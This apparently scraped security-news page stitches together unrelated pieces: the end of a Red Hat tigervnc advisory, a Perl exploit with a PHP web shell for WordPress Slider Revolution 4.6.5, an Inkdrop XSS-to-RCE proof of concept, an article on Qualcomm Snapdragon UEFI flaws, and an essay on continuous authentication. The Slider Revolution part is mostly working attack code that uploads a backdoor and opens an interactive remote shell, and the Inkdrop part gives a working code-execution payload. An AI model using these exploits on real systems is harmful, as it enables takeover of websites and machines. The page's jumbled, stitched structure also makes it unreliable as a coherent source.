ppc64:  
tigervnc-debuginfo-1.8.0-23.el7_9.ppc64.rpm  
tigervnc-server-module-1.8.0-23.el7_9.ppc64.rpm

ppc64le:  
tigervnc-debuginfo-1.8.0-23.el7_9.ppc64le.rpm  
tigervnc-server-module-1.8.0-23.el7_9.ppc64le.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
tigervnc-1.8.0-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-23.el7_9.noarch.rpm  
tigervnc-license-1.8.0-23.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-23.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4283  
https://access.redhat.com/security/cve/CVE-2022-46340  
https://access.redhat.com/security/cve/CVE-2022-46341  
https://access.redhat.com/security/cve/CVE-2022-46342  
https://access.redhat.com/security/cve/CVE-2022-46343  
https://access.redhat.com/security/cve/CVE-2022-46344  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7xCG9zjgjWX9erEAQhRkQ/8Dhfac5mbIZvKBZqOoITdzVuznH7nN6/A  
GVkcGVxLR4wjtpl8f47ostCfXiM6jmz0hbCpvxMdc8T9HFnfrjSspoAaYAxwGe/d  
C+u7ApAfhf8GBi8qIjcq4JhmLB7WtaHwVhir1wuBlG59SdA3lCa7Wu/22IAqLg1C  
FQj5OXYY7gTCLfgYUOkoEnIL6T5riUXOnBv0C/TpRgxzjeGpyjEJaXZ0IEM1sw5S  
xk6/RK8tuxe4yWlF2os7BOZMZgKszcSAQB2X4MQiKJBDjbdHDzMm5gAbrjg0HkpI  
H0kl1hbHuhaMh1NKfa5Sc5UuEljC2pdQoSLOCSOtWthrhzlU34zv27D84i5hx/JU  
Gf/v4VEm+m2pCOV0Z2a8ebcSsLqNXsXGZtO64LfoAG0+QhTOaPULHLdS/h0R3m/k  
7TRZWnGBwTEH+wQsntcAJWUxK2DNFoIC3ykz3AY5qQcj0URvZWUpuwZtMYLQrdVf  
05FbK6m9WCoEi55IzVIdtoWkj3Hpc9qpnFUmRlmjPimoWMhxKEzw74KXoJ8xly9l  
QkQjIPOCymGu4zOSToCEeU4xjJoB0Cp2frylsELFU6YWfu3gPUwGNvKF6xo5Dm6b  
F5XA+Y1oSdjbnoPyIFKwtcLhSS/DE+uoRK53h6atEB9PSRG5lA57GzAMbeI6Z/lK  
g2R2oHal1ds=  
=WAMV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0045-01

WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               |   
| # Vendor    : https://www.sliderrevolution.com/                                                                                  |    
| # Dork      : index off revslider\backup                                                                                         |  
====================================================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to load the HTTP php shell through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl  
#  
# Title     :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit   
# Author    :indoushka  
# Vendor    :https://www.sliderrevolution.com/

use LWP::UserAgent;  
use MIME::Base64;  
use strict;

sub banner {  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
print "   ============[+] Author : indoushka[+]===================\n";  
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit     [+]\n";  
print "   ========================================================   \n";  
print "[+] Uploading an web shell:                                [+]\n";  
print "[+] The following perl exploit will attempt to load the    [+]\n";   
print "[+] HTTP php backdoor through the update_plugin function   [+]\n";  
print "[+] To use the exploit, make sure you compress the backdoor[+]\n";   
print "============================================================== \n";  
system('color a');  
}

if (!defined ($ARGV[0] && $ARGV[1])) {  
banner();  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}

my $zip1 = "indoushka.zip";

unless (-e ($zip1))  
{   
banner();  
print "[-] $zip1 not found! RTFM\n";  
exit;  
}

my $host = $ARGV[0];  
my $plugin = $ARGV[1];  
my $action;  
my $update_file;

if ($plugin eq "revslider") {  
$action = "revslider_ajax_action";  
$update_file = "$zip1";  
}  
elsif ($plugin eq "showbiz") {  
$action = "showbiz_ajax_action";

}  
else {  
banner();  
print "[-] Wrong plugin name\n";  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}  
my $target = "wp-admin/admin-ajax.php";  
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
);  
my $random = $array[rand @array];  
return($random);  
}  
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent($useragent);  
my $status = $ua->get("$host/$target");  
unless ($status->is_success) {  
banner();  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

banner();  
print "[*] Target set to $plugin\n";  
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "[+] Payload successfully executed\n";  
}

elsif ($exploit->decoded_content =~ /Wrong request/) {  
print "[-] Payload failed: Not vulnerable\n";  
exit;  
}

elsif ($exploit->decoded_content =~ m/0$/) {  
print "[-] Payload failed: Plugin unavailable\n";  
exit;  
}

else {  
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;  
print "[-] Payload failed:$1\n";  
print "[-] " . $exploit->decoded_content unless (defined $1);  
print "\n";  
exit;  
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }  
my $rndstr = rndstr(8, 1..9, 'a'..'z');  
my $cmd1 = encode_base64("echo $rndstr");  
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) {  
print "[-] Xploit failed: system() has been disabled\n";  
exit;  
}

elsif ($status->decoded_content !~ /$rndstr/) {  
print "[-] Xploit failed: " . $status->status_line . "\n";  
exit;  
}

elsif ($status->decoded_content =~ /$rndstr/) {  
print "[+] Shell successfully uploaded\n";  
}  
my $cmd2 = encode_base64("whoami");  
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");  
my $cmd3 = encode_base64("uname -n");  
my $uname = $ua->get("$host/$shell?cmd=$cmd3");  
my $cmd4 = encode_base64("id");  
my $id = $ua->get("$host/$shell?cmd=$cmd4");  
my $cmd5 = encode_base64("uname -a");  
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");  
print $unamea->decoded_content;   
print $id->decoded_content;  
my $wa = $whoami->decoded_content;  
my $un = $uname->decoded_content;  
chomp($wa);  
chomp($un);

while () {  
print "\n$wa\@$un:~\$ ";  
chomp(my $cmd=<STDIN>);  
if ($cmd eq "exit")   
{   
print "Aurevoir!\n";  
exit;  
}  
my $ucmd = encode_base64("$cmd");  
my $output = $ua->get("$host/$shell?cmd=$ucmd");  
print $output->decoded_content;  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.6.5 Shell Upload

The issue concerns the boot layer of ARM chips, which are driving a low-power mobile ecosystem that includes 5G smartphones and base stations.

A security company is leading the coordinated vulnerability disclosure of multiple high-severity vulnerabilities in the Qualcomm Snapdragon chipset.

The vulnerabilities were identified in the Unified Extensible Firmware Interface (UEFI) firmware reference code and impacts ARM-based laptops and devices using Qualcomm Snapdragon chips, according to Binarly Research.

Qualcomm disclosed the vulnerabilities on Jan. 5, along with links to available patches. Lenovo has also issued a bulletin and a BIOS update to address the flaws in affected laptops. However, two of the vulnerabilities are still not fixed, Binarly noted.

If exploited, these hardware vulnerabilities allow attackers to gain control of the system by modifying a variable in nonvolatile memory, which stores data permanently, even when a system is turned off. The modified variable will compromise the secure boot phase of a system, and an attacker can gain persistent access to compromised systems once the exploit is in place, says Alex Matrosov, founder and CEO of Binarly.

"Basically, the attacker can manipulate variables from the operating system level," Matrosov says.

**Firmware Flaws Open the Door to Attacks**

Secure boot is a system deployed in most PCs and servers to ensure that devices start properly. Adversaries can take control of the system if the boot process is either bypassed or under their control. They can execute malicious code before the operating system is loaded. Firmware vulnerabilities are like leaving a door open — an attacker can gain access to system resources as and when they please when the system is switched on, Matrosov says.

"The firmware piece is important because the attacker can gain very, very interesting persistence capabilities, so they can play for the long term on the device," Matrosov says.

The flaws are notable because they affect processors based on the ARM architecture, which are used in PCs, servers, and mobile devices. A number of security problems have been discovered on x86 chips from Intel and AMD, but Matrosov noted that this disclosure is an early indicator of security flaws existing in ARM chip designs.

Firmware developers need to develop a security-first mindset, Matrosov says. Many PCs today boot based on specifications provided by UEFI Forum, which provides the hooks for the software and hardware to interact.

"We found that OpenSSL, which is used in UEFI firmware — it's in the ARM version — is very outdated," Matrosov says. "As an example, one of the major TPM providers called Infineon, they use an 8-year-old OpenSSL version."

**Addressing Affected Systems**

In its security bulletin, Lenovo said the vulnerability affected the BIOS of the ThinkPad X13s laptop. The BIOS update patches the flaws.

Microsoft's Windows Dev Kit 2023, code-named Project Volterra, is also impacted by the vulnerability, Binarly said in a research note. Project Volterra is designed for programmers to write and test code for the Windows 11 operating system. Microsoft is using the Project Volterra device to lure conventional x86 Windows developers into the ARM software ecosystem, and the device's release was a top announcement at Microsoft's Build and ARM's DevSummit conferences last year.

The Meltdown and Spectre vulnerabilities largely affected x86 chips in server and PC infrastructures. But the discovery of vulnerabilities in ARM's boot layer is particularly concerning because the architecture is driving a low-power mobile ecosystem, which includes 5G smartphones and base stations. The base stations are increasingly at the center of communications for edge devices and cloud infrastructures. Attackers could behave like operators, and they will have persistence at base stations and nobody will know, Matrosov says.

System administrators need to prioritize patching firmware flaws by understanding the risk to their company and addressing it quickly, he says. Binarly offers open source tools to detect firmware vulnerabilities.

"Not every company has policies to deliver firmware fixes to their devices," Matrosov says. "I have worked for large companies in the past, and before I started my own company, none of them — even these hardware-related companies — had an internal policy to update the firmware on employee laptops and devices. This is not right."

Latest Firmware Flaws in Qualcomm Snapdragon Need Attention

An issue in Inkdrop v5.4.1 allows attackers to execute arbitrary commands via uploading a crafted markdown file.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**inkdrop XSS to RCE Poc**

**Product Presentation:**

Solely designed for Markdown to improve your dev workflow. Get a low-friction personal note-taking workflow and accomplish more. With your notes well-organized effortlessly, you can stay focused on doing your best work.

**Product Website:** https://www.inkdrop.app/

**Product download Address:** https://d3ip0rje8grhnl.cloudfront.net/v5.4.1/Inkdrop-demo-5.4.1-Windows.zip

**Version:** 5.4.1

**Payload:** write payload into markdown file,'preload.js' need absolute address to introduce.

    <iframe src=javascript:alert('xss')></iframe>
    <iframe src=1 preload="C:\Users\root\Downloads\Inkdrop-demo-5.4.1-Windows\resources\app\preload.js"></iframe> # absolute path
    

preload.js:

    require('child_process').exec('calc.exe')
    

POC video

CVE-2022-46603: GitHub - 10cks/inkdropPoc: inkdrop XSS to RCE Poc

A model of continuous authentication and identification is needed to keep consumers safe.

The emergence of Web 3.0 came during a pivotal transformation for the world. Though we were told to stay home and limit face-to-face interactions during the COVID-19 pandemic, life had to keep moving. Business needed to proceed as usual, deals needed to be signed, and money still needed to be transferred. Web 3.0 is an opportunity for businesses to embrace a digital future that will make all of this easier.

Many more things can and are being done digitally compared with three years ago, and while the benefits are clear, new risks and challenges have emerged. With the transition to Web 3.0, the attack surface has also shifted to the largely unchecked customer journey. As a result, our information, money, and identity are more vulnerable than ever before.

**Trust Levels Have Risen****

Ten years ago, purchasing something online for $20 was a big deal, but today, we make large purchases online without a second thought. Our level of comfort has grown immensely over the years and will only continue to grow. We may have started off making small purchases, but now, high-value transactions like loans, money transfers, and insurance claims are all digital, which means there's much more at stake.

At a consumer level, platforms like Apple Pay and Amazon Pay have emerged, which infuse a sense of trust and security into online purchases. Still, when asked to enter our personal credit card information, many of us pause and consider the legitimacy of the site, vendor, etc. A system with the comfort level provided by platforms like Apple Pay doesn't yet exist for high-value business transactions. What's more, there is no system in place to confirm that a company is who it says it is. Or that a link is valid. Or that a real loan is being signed. The move to a digitized world happened so quickly that no one stopped to think about the fact that we need to make sure the process is legitimate. Without face-to-face interactions, how do we know what is real?

There's a reason phishing attacks have grown by 61% since 2021 and a reason bots are more prominent now than they were five years ago: Because attackers have identified an opportunity and seized it. As an industry, we are at an impasse because our solutions have focused on protecting endpoints. But we now need to secure complete digital processes and customer journeys. We need to consistently prove our identity. Solutions like multifactor authentication (MFA), biometrics, and token-based authentication do some of this today, but unfortunately, it's not enough. Almost every week we see stories of sophisticated business email compromise (BEC) scammers bypassing MFA, leveraging tactics like adversary-in-the-middle (AiTM) phishing attacks.

****It's Time for a New Model****

Organizations should examine their customer journeys and identify friction points. This will allow them to pinpoint instances throughout the journey that attackers could exploit. Most organizations have identified at least one of these instances and put protective measures in place. For example, before we can view our final bill, we get a text with a six-digit code we must enter before moving any further in the process. These are the right steps, but we must remember that a digital transaction isn't just a one-step process.

We're moving toward a model that requires continuous authentication and identification throughout these transactions. This model will look slightly different for each organization, but it ultimately will follow these five steps:

1.  Take an unknown identity and turn it into a known one. This should happen at the beginning of every process before any engagement or transaction occurs. Every party involved should prove their identity, whether it be via government-issued ID, biometrics, etc.
2.  Once identities are confirmed and verified, individualized credentials should be distributed to access the digital property — whether it be a website, app, electronic document, or virtual environment.
3.  Guide customers and consumers through multistep and high-assurance transactions over an interactive, secure virtual environment with various authentication methods.
4.  To execute and complete the transaction itself, the process needs to offer strong identity assurance, be equipped with capabilities like digital signature encryption, and comply with the most rigorous security standards and regulations.
5.  Many contracts must be stored and maintained as unique, original copies throughout their lifecycle in accordance with laws such as ESIGN, the Uniform Electronic Transactions Act (UETA), and Uniform Commercial Code (UCC) Article 9-105. To ensure the integrity of the document or transaction, you must preserve the chain of custody and capture the audit trail.

With a shift in the attack surface, security will need to be woven throughout the journey and throughout workflows, and it will need to be done seamlessly to avoid disrupting the digital experience that exists. As we move into the new year, I anticipate this will be a top priority for organizations and security companies alike, and proving identity and ensuring trust in digital processes will become the defining factor of success.

**

Tag

#ssl